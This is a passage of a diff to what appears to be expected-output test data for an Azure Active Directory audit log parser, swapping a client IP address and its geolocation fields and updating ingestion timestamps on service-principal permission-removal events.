https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", 
+ "ingested": "2021-12-09T13:41:51.125048500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -7968,25 +7284,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8000,7 +7298,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8136,7 +7434,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -8148,12 +7446,12 @@
"id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
},
"client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
},
"event": {
- "ingested": "2021-06-17T07:32:38.036337600Z",
- "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125054Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8179,25 +7477,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8211,7 +7491,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8347,7 +7627,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -8359,12 +7639,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036342400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
